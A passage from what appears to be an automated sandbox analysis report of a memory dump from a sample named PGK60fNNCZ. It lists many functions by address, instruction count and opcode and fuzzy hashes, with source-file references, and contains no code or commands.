                                                            • Instruction ID: 5a7c4e080ae25b111902f5dd27c1070fd8554b58eab405d909827c018935ef05
                                                            • Opcode Fuzzy Hash: 5ce86fcae609cea2e0c0b5fe9a37d02903fc6dc3831b758469b94737c40124b2
                                                            • Instruction Fuzzy Hash: DD11AC76610648AFEF35CF99D880F5677A8EBAAB64F144119F8048B290C774FC42EF61
                                                            Function 01064B00 Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4a5bd2689f09ba5eec5d4437469572a40538b395fb8d14e052524a107a9f4379
                                                            • Instruction ID: 99a63e02a008a476c33960b3b4327d4206d3249177220ac53c8520ddaaced9e8
                                                            • Opcode Fuzzy Hash: 4a5bd2689f09ba5eec5d4437469572a40538b395fb8d14e052524a107a9f4379
                                                            • Instruction Fuzzy Hash: E911E5362006119FD762DA69DC40F6BBBEAFFC5710F155469EAC2C7694EA30E902CB90
                                                            Function 00FC6620 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22590c6cbbf3204e68809984c3e970c29331d68fa21cc449f646b07b5e80a1fe
                                                            • Instruction ID: a4e3fb642c4f0a9135999cbe4ad94930294439f752d9362b9bebdd4085d6a666
                                                            • Opcode Fuzzy Hash: 22590c6cbbf3204e68809984c3e970c29331d68fa21cc449f646b07b5e80a1fe
                                                            • Instruction Fuzzy Hash: 1311C272D00616ABDB22EF58CE82F5EF7B9EF84750F500059E901AB201D734AD01AB90
                                                            Function 00FBEA2E Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e625095958b1638644eaae24674c5b7da66b78c9193110c93aa0da90bf9a8d7
                                                            • Instruction ID: 3b4653ccf182d3f78f33dbff4fb4aaf368a5fb2c21e846a7c91798debff50e06
                                                            • Opcode Fuzzy Hash: 0e625095958b1638644eaae24674c5b7da66b78c9193110c93aa0da90bf9a8d7
                                                            • Instruction Fuzzy Hash: EC0192755042089FD725EF16D845F96BBFDFB85324F21816AE0458B261C7789C42DF90
                                                            Function 00FBE53E Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                            • Instruction ID: 3c615a2beb63c3321fb36acfc157e2aaa6801b6bfad591236c14a23cab3de52e
                                                            • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                            • Instruction Fuzzy Hash: 9011CE72A016C9DBD73297698D44BB57794AF01768F2D00B0EA41DB6A2F72CCC46FA60
                                                            Function 0101E75D Relevance: .1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                            • Instruction ID: 834be193991078cf0cf8d8eee8752ff8ee8009a129c609dbb01094af648db4cd
                                                            • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                            • Instruction Fuzzy Hash: 4B01C032600106AFFB26AB98CC00B5E7AE9FF41B50F158064FE859B264E779DD40DB90
                                                            Function 00F8A250 Relevance: .1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                            • Instruction ID: d00182af908729f3969ab0e90e102b03c3e644607543fdea0150359f11cdf4ce
                                                            • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                            • Instruction Fuzzy Hash: 7B012272804B119BDB309F15D840AB27BB5EF55B707008A6EFC958B281D735D801EBA1
                                                            Function 01064940 Relevance: .1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b041e48e7f6a9d59a2835b0cb0523128ee8721fbaf1c1f54b21a83fb631b969f
                                                            • Instruction ID: 68317a19e510825e32a1985615c721a570aab4a5945bf99d5866b041a4b75e6b
                                                            • Opcode Fuzzy Hash: b041e48e7f6a9d59a2835b0cb0523128ee8721fbaf1c1f54b21a83fb631b969f
                                                            • Instruction Fuzzy Hash: E601C0725916009FC362DF1CDC40E16BBEDEB85774B2542A5E9E8DB1A6E630D801CBA0
                                                            Function 0100E1D0 Relevance: .1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f3ca3a14099f58116026f9991dc0f4c5f485e1e32bf48a733c45c7cb86d8e6b9
                                                            • Instruction ID: 51376b1d1d915cac9e405c13c496664338fc9143d574ce86223f5f9479995fd0
                                                            • Opcode Fuzzy Hash: f3ca3a14099f58116026f9991dc0f4c5f485e1e32bf48a733c45c7cb86d8e6b9
                                                            • Instruction Fuzzy Hash: 4111E132241200EFEB16EF59CD81F06BBB8FF44B44F1004A5F9059B292C235ED00CA90
                                                            Function 00F96259 Relevance: .1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0fd4c941bdce0d6fbe8555a53a4ffb4972e4b32aa63e0f3da44c492602e22e15
                                                            • Instruction ID: e3c78bfd44d765ea1aadb94c5a4de557eebdc19f6f1863f0543d8fc4dac8e735
                                                            • Opcode Fuzzy Hash: 0fd4c941bdce0d6fbe8555a53a4ffb4972e4b32aa63e0f3da44c492602e22e15
                                                            • Instruction Fuzzy Hash: 8211CE70901218ABEF65AB60CD42FE8B375AF44710F104096B318A61E1CB749E81EF84
                                                            Function 00F9208A Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                            • Instruction ID: 035d0c9780e9e7ed552a39f7a55c7942449ae33fe281027bc322b91c71fd2d6e
                                                            • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                            • Instruction Fuzzy Hash: 81014C33A002009BEF909E19DC84B92776ABFD4720F2540B5EC41CF256EA71CC81F790
                                                            Function 01016050 Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a226f713271bfe5a7282994dcc158dd6cc4557d6dba716c4a450befaad9bb67f
                                                            • Instruction ID: 73e7b7d03697b600cf6b11c83989711f86578af73d2f76330b619d5fabeacce9
                                                            • Opcode Fuzzy Hash: a226f713271bfe5a7282994dcc158dd6cc4557d6dba716c4a450befaad9bb67f
                                                            • Instruction Fuzzy Hash: C1111B72900119ABCB12DB94CC81DEF777CEF48354F044166A946E7211EA35AA55CBA0
                                                            Function 01026500 Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7e02a4f95d13a25d2f76009fafcbed9c1d07b2c63134d4ffd7860cf94cb19ae2
                                                            • Instruction ID: dc408b83c42fd30215712c5e8257f2dcd3497a0fb5a4bf0883a7c47320e73543
                                                            • Opcode Fuzzy Hash: 7e02a4f95d13a25d2f76009fafcbed9c1d07b2c63134d4ffd7860cf94cb19ae2
                                                            • Instruction Fuzzy Hash: FF11A1726441659FD711CF58D840BA6FBF9FB5A314F088199EC888B316D736EC81CBA0
                                                            Function 0101C810 Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 967dad939fef4c30d0b7afe228f64feec4f28f35106dcb26f175e4c37744a510
                                                            • Instruction ID: 87b1a7c8368db902920071d77a3c2c5d069ad27fb1729c28fe41dc07510f74f6
                                                            • Opcode Fuzzy Hash: 967dad939fef4c30d0b7afe228f64feec4f28f35106dcb26f175e4c37744a510
                                                            • Instruction Fuzzy Hash: 6B11ECB1A002099BCB04DF99D585A9EB7F4EF48350F14806AB905E7355D678EA018BA4
                                                            Function 00FD20F0 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a2626993e11a89a4504ae20803d6c15fff861f4a441185058b1313c53d2e45eb
                                                            • Instruction ID: fa67e32c9068fb4d6e324a966ce8b745f0aba14ffd27266ac566754dee8c541b
                                                            • Opcode Fuzzy Hash: a2626993e11a89a4504ae20803d6c15fff861f4a441185058b1313c53d2e45eb
                                                            • Instruction Fuzzy Hash: 09116D71A0120DEBDB05EFA4C851FAE7BB6EB44340F108099F94197390DA35AE11DB90
                                                            Function 00F8C020 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                            • Instruction ID: 2d0481916ab27ed2dd96ce9d669962a2448ac513d1d37c51d7cf48197b9f1587
                                                            • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                            • Instruction Fuzzy Hash: 0101B532500745DFDB22A666CD00FE777E9FFC5364F154419A946CB940EE74E901EBA0
                                                            Function 00FCE5CF Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba73a3ade231b686cfbd185a6e3c38544e871dc79d594985103875a7ca3bb025
                                                            • Instruction ID: 530455b7237ded5cdf36a8b3e620e026604f3d37eebe0b4ef0408042dc4233fa
                                                            • Opcode Fuzzy Hash: ba73a3ade231b686cfbd185a6e3c38544e871dc79d594985103875a7ca3bb025
                                                            • Instruction Fuzzy Hash: 5A0184F1751901BFD251BB6DCD41E57BBECFF4A764B040629B50893952DB28EC01D6A0
                                                            Function 010269C0 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0a8e288099f7a1e40daac90c29f783652b63ac44c5d8228f94c53f44ee58afd0
                                                            • Instruction ID: 4f5fed7c1a61bcecd476662c1b4ffa3bd76d0ce6e7fe0bf6bac7d267160d9efc
                                                            • Opcode Fuzzy Hash: 0a8e288099f7a1e40daac90c29f783652b63ac44c5d8228f94c53f44ee58afd0
                                                            • Instruction Fuzzy Hash: 4E01FC32224215DBC324EF69C84996BFBE8FF45760F114169FD99872C0E7359901CBD1
                                                            Function 0101C460 Relevance: .0, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7444a80d52f0afe3fa686005be5c09839129c5aecc76b7522b3c571fd5aabf94
                                                            • Instruction ID: b221ec8efb89e0b75d67e3e639fa5f820faa091ae1542a5925a2765f16350d6f
                                                            • Opcode Fuzzy Hash: 7444a80d52f0afe3fa686005be5c09839129c5aecc76b7522b3c571fd5aabf94
                                                            • Instruction Fuzzy Hash: 7111AD70A4020CEBDB14EFA8C945EAE7BB6EB48300F004099FD4197344DB39EE11DB90
                                                            Function 0101C97C Relevance: .0, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5d9de3e3379cab3b589b1c950837a84e666cf4c2901f9482cefd6d45d9eff8dc
                                                            • Instruction ID: 9eeef441330cb45170503c05c76fa8f519b35cbf4229afd4139e21295caac893
                                                            • Opcode Fuzzy Hash: 5d9de3e3379cab3b589b1c950837a84e666cf4c2901f9482cefd6d45d9eff8dc
                                                            • Instruction Fuzzy Hash: 32118BB16183089FC700DF69C84695BBBE4EF88310F00851FFA98D7391E634E900CB92
                                                            Function 0101CA11 Relevance: .0, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b9275953f23bdb87fcbe492aa1003590b22c3dfe73763e713043cc950e7959a0
                                                            • Instruction ID: 95ecb67ea4613f206e81f89f81f7731475dec2a22fac5302283d318fc9cf22dd
                                                            • Opcode Fuzzy Hash: b9275953f23bdb87fcbe492aa1003590b22c3dfe73763e713043cc950e7959a0
                                                            • Instruction Fuzzy Hash: 9C118BB26183089FC300DF69C84194BBBE4EF89350F00851FFA98D73A5E634E900CB92
                                                            Function 00FAE016 Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                            • Instruction ID: 2bf801f8592f538efa4d17201967f1f108780b47c6b0516d171d116414b50f91
                                                            • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                            • Instruction Fuzzy Hash: 3B018BB26046C4DFD322871EC948F26BBECEF56760F0944A1F805CB6A1D6B8DC40E621
                                                            Function 00F8826B Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 87ad58833ef28cf80f1ed795036c5c098a2cb3641f2498f016040324a2eeef96
                                                            • Instruction ID: 454f9071854ca9d1ec2f7b67c4d05fbf98acae15c82ef8a4b7fb9f026a4f6d21
                                                            • Opcode Fuzzy Hash: 87ad58833ef28cf80f1ed795036c5c098a2cb3641f2498f016040324a2eeef96
                                                            • Instruction Fuzzy Hash: 2F01F732B00A08DBCB14FB69DC059EE73A9FF80760B558029D941A7249DE30DD02D390
                                                            Function 0103EB50 Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 355316e1eaf3bcd96e59262f3731102d36c173b42356ac156017ff84debedf70
                                                            • Instruction ID: 3509f0b3ba9112bb091089a365d0d30e9011b2544311f27eda3ad98b7a318f8a
                                                            • Opcode Fuzzy Hash: 355316e1eaf3bcd96e59262f3731102d36c173b42356ac156017ff84debedf70
                                                            • Instruction Fuzzy Hash: 5701DFB1684700AFD3366B19D841B0ABAACAF85F50F11042AB2858F391D6B5D8408B94
                                                            Function 00F92582 Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dc7aca3260fff4307b80d125e59923c01271f3d9b9e1da8d94cc3cb323d85b24
                                                            • Instruction ID: 74db771339001352e37fc1d25b69afe5b207a5e08d130f4f2e071a6522aad888
                                                            • Opcode Fuzzy Hash: dc7aca3260fff4307b80d125e59923c01271f3d9b9e1da8d94cc3cb323d85b24
                                                            • Instruction Fuzzy Hash: 72F0F473A41A20BBDB31DB568C40F07BAAAEB84BA0F154029B50597640CA34ED05EAA0
                                                            Function 00FBC073 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                            • Instruction ID: c400cfacb2cc98231e38b00387a0f38f32bc74ca18de68e2e0912c83090c8d61
                                                            • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                            • Instruction Fuzzy Hash: D0F0C2B2A00A10ABD324DF4EDC41E57F7EADFC0B90F048129A505C7320EA31DD04CB90
                                                            Function 0106634F Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3104d452aa34f926c5134669549249e682ba67eb14d3e16492c16e525017418a
                                                            • Instruction ID: 5ec37b27f5fd8d0db87705d7c92dbf9bf1830fb17991885d3a5fbb9cee3fe650
                                                            • Opcode Fuzzy Hash: 3104d452aa34f926c5134669549249e682ba67eb14d3e16492c16e525017418a
                                                            • Instruction Fuzzy Hash: 780184B1A1020DEFCB00DFA9D84199EB7F8EF48304F10806AF900E7351D638AA009BA0
                                                            Function 0106625D Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6325ec7cb78742dae1c616f11b8e45e70c432219fe8b3d465f5ccfa0ebd1ff3a
                                                            • Instruction ID: 0e18ce24d66729d5175d3b6183f735afe5f8ee18e2c6b63698d5001b6e8723bf
                                                            • Opcode Fuzzy Hash: 6325ec7cb78742dae1c616f11b8e45e70c432219fe8b3d465f5ccfa0ebd1ff3a
                                                            • Instruction Fuzzy Hash: 060144B1A1060DEFCB04DFA9D8559AEB7F8EF48304F14806AF904E7351D678AA01CBA4
                                                            Function 010662D6 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba1c4c9f15fba0cd4eb6ddfee6cb81c2695a539e7281725e21b8a7cbac1cda17
                                                            • Instruction ID: 8e845688f3f0cf9a2c0043e02d4e1ca39602ac0f890232a7989306bf8ab42c55
                                                            • Opcode Fuzzy Hash: ba1c4c9f15fba0cd4eb6ddfee6cb81c2695a539e7281725e21b8a7cbac1cda17
                                                            • Instruction Fuzzy Hash: B70184B1A0020DEFCB00DFA9D85599EB7F8EF48304F50806AF900E7351D674AE008BA0
                                                            Function 00F8C310 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                            • Instruction ID: ede980157cbdb7cdd790847f68d8c679e7e53ad7ef98406cb2a70f1635e80cde
                                                            • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                            • Instruction Fuzzy Hash: 0BF0FC73604632ABD73236595C41BABB6958FD1B74F1A8035F2059B244C9748C03B7F1
                                                            Function 00FCCA6F Relevance: .0, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                            • Instruction ID: 1fc1fa657f65ddf1c6dea50bff422464eed2c6c97dd9cfa8524f47b936ccdad4
                                                            • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                            • Instruction Fuzzy Hash: C401AE32600589DBD323975DC90AF59BBD8FF41754F0980A6F984CB692DA7DC940D251
                                                            Function 010661E5 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 662a5c8ba9b4159d2de21fb32cf68a602807ba9f5a5c64466e9130a5dd1039c9
                                                            • Instruction ID: 4eedadaf830a867d6b8014794d26494d43052fec114a907412b2780b1acf475d
                                                            • Opcode Fuzzy Hash: 662a5c8ba9b4159d2de21fb32cf68a602807ba9f5a5c64466e9130a5dd1039c9
                                                            • Instruction Fuzzy Hash: 91018FB1A00249DBCB00DFA9D845AEEBBF8AF48310F14405AF500B7380DB38EA01CB94
                                                            Function 010163C0 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
